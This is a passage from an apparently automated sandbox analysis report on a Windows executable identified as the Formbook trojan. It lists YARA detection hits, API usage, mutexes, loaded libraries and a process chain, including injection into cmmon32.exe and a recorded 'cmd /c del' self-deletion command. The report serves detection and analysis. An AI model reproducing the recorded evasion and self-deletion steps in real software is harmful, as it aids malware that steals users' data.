                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB132D14_2_04CB132D
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BED34C14_2_04BED34C
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBFCF214_2_04CBFCF2
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C79C3214_2_04C79C32
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C1FDC014_2_04C1FDC0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C03D4014_2_04C03D40
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB1D5A14_2_04CB1D5A
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB7D7314_2_04CB7D73
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C09EB014_2_04C09EB0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C01F9214_2_04C01F92
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BC3FD514_2_04BC3FD5
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BC3FD214_2_04BC3FD2
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBFFB114_2_04CBFFB1
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBFF0914_2_04CBFF09
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C038E014_2_04C038E0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C6D80014_2_04C6D800
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C0995014_2_04C09950
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C1B95014_2_04C1B950
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C9591014_2_04C95910
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CADAC614_2_04CADAC6
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C45AA014_2_04C45AA0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C9DAAC14_2_04C9DAAC
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CA1AA314_2_04CA1AA3
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBFA4914_2_04CBFA49
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB7A4614_2_04CB7A46
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C73A6C14_2_04C73A6C
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C75BF014_2_04C75BF0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C3DBF914_2_04C3DBF9
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C1FB8014_2_04C1FB80
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBFB7614_2_04CBFB76
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02CAE80A14_2_02CAE80A
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02C99E5014_2_02C99E50
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02C92FB014_2_02C92FB0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02C92D8914_2_02C92D89
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02C92D9014_2_02C92D90
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04ADA03614_2_04ADA036
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04ADE5CD14_2_04ADE5CD
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04AD2D0214_2_04AD2D02
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04AD108214_2_04AD1082
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04AD891214_2_04AD8912
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04ADB23214_2_04ADB232
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04AD5B3014_2_04AD5B30
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04AD5B3214_2_04AD5B32
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04C7F290 appears 104 times
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04C35130 appears 58 times
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 003365D7 appears 33 times
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04BEB970 appears 277 times
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04C47E54 appears 111 times
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0033554A appears 43 times
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04C6EA12 appears 86 times
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: String function: 01065130 appears 58 times
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: String function: 0101B970 appears 277 times
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: String function: 010AF290 appears 105 times
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: String function: 01077E54 appears 111 times
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: String function: 0109EA12 appears 86 times
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000000.1268307730.0000000000FB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameyXcfL.exe: vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1306814449.0000000007CA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1307423026.0000000009460000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1297563213.00000000045BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1295745302.00000000016FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363227417.0000000000F79000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000B8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363401729.000000000111D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exeBinary or memory string: OriginalFilenameyXcfL.exe: vs xU0wdBC6XWRZ6UY.exe
                Source: xU0wdBC6XWRZ6UY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: xU0wdBC6XWRZ6UY.exe PID: 1540, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Process Memory Space: xU0wdBC6XWRZ6UY.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: Process Memory Space: cmmon32.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                Source: xU0wdBC6XWRZ6UY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, lNjw1JhxSV5n0cCMNW.csCryptographic APIs: 'CreateDecryptor'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, KZZXqcc8tiXrQFatx7.csSecurity API names: _0020.SetAccessControl
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, KZZXqcc8tiXrQFatx7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, KZZXqcc8tiXrQFatx7.csSecurity API names: _0020.AddAccessRule
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, BMr7Oeh4xf4rlMegaY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, BMr7Oeh4xf4rlMegaY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, KZZXqcc8tiXrQFatx7.csSecurity API names: _0020.SetAccessControl
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, KZZXqcc8tiXrQFatx7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack, KZZXqcc8tiXrQFatx7.csSecurity API names: _0020.AddAccessRule
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack, BMr7Oeh4xf4rlMegaY.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KZZXqcc8tiXrQFatx7.csSecurity API names: _0020.SetAccessControl
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KZZXqcc8tiXrQFatx7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KZZXqcc8tiXrQFatx7.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.evad.winEXE@112/1@12/6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xU0wdBC6XWRZ6UY.exe.logJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMutant created: NULL
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_03
                Source: C:\Windows\SysWOW64\cmmon32.exeCommand line argument: @s314_2_00337290
                Source: xU0wdBC6XWRZ6UY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: xU0wdBC6XWRZ6UY.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: xU0wdBC6XWRZ6UY.exeReversingLabs: Detection: 73%
                Source: unknownProcess created: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess created: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"
                Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess created: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"Jump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe "C:\Windows\SysWOW64\cmmon32.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: cmutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: xU0wdBC6XWRZ6UY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: xU0wdBC6XWRZ6UY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cmmon32.pdb source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363227417.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: cmmon32.pdbGCTL source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1362892072.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363227417.0000000000F70000.00000040.10000000.00040000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3714532226.0000000000330000.00000040.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: xU0wdBC6XWRZ6UY.exe, 0000000B.00000002.1363401729.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1364936334.0000000004A16000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004D5E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000003.1363062363.0000000004862000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 0000000E.00000002.3734185638.0000000004BC0000.00000040.00001000.00020000.00000000.sdmp
